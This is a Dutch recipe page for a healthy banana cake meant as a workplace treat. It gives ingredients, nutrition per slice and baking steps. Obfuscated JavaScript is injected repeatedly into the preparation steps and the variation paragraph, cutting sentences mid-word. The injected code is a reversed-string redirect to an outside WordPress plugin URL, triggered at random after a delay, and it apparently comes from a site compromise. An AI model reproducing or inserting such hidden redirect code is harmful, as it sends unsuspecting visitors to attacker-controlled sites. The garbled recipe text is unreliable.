Gezonde traktaties september

Ook deze maand kun je met deze heerlijke traktatie jouw collega’s verrassen.

Bananencake

Vers, gezond en lekker; zo valt deze bananencake het best te omschrijven. Door vers fruit en volkorenmeel te gebruiken, maak je de cake gezond. Beide ingrediënten bevatten namelijk vezels, waarvan je dagelijks 30-40 gram nodig hebt. Door de combinatie van vezels en luchtige structuur voel je je verzadigd, zonder dat je vol zit. Daarnaast is de cake vetarm. Zo kom je energiek de werkdag door!

Ingrediënten voor 1 cake

Gezonde traktaties op het werk: Bananen cake - Enerjoy

  • 1 kleine rijpe banaan
  • 100 gram dieetmargarine
  • 175 gram kristalsuiker
  • 1 zakje vanillesuiker
  • 1 theelepel citroenrasp
  • 2 eieren
  • 200 gram zelfrijzend bakmeel
  • 1 theelepel bakpoeder
  • 4 eetlepels halfvolle melk
  • Cakeblik

Voedingswaarden per plak

Energie: 145 kcal
Eiwit: 3 gram
Koolhydraten: 25 gram
Vet: 4 gram

Bereiding (15 minuten, 90 minuten bakken)

  1. Vet het bakblik in. Prak de banaan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot moes of pureer hem met een staafmixer;
  2. Doe de bananenmoes, margarine, suiker, vanillesuiker, en citroenrasp in een kom en klop met een mixer het geheel goed luchtig;
  3. Roer dan een voor een de eieren erdoor. Zeef dan het zelfrijzend bakmeel en bakpoeder in gedeeltes boven de kom;
  4. Schep met een spatel het zelfrijzend bakmeel voorzichtig door het beslag. Spatel dan beetje bij beetje de melk erdoor;
  5. Schep het beslag in het cakeblik en bak de cake in het midden van de voorverwarmde oven in 1 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 1 1/2 uur gaar;
  6. Laat de cake op een taartrooster iets afkoelen, keer het cakeblik om en haal de cake uit de vorm. Laat de cake verder afkoelen;
  7. Snijd plakken van 2 cm af.

Variatie

In plaats van vanillesuiker kan je een echte vanillepeul met merg gebruiken. Los deze op in de melk alvorens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe te voegen. Vervang de banaan door ander zoet fruit of seizoensfruit. Vervang de suiker door de gepaste hoeveelheid zoetstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof.
Bron recept: www.smulweb.nl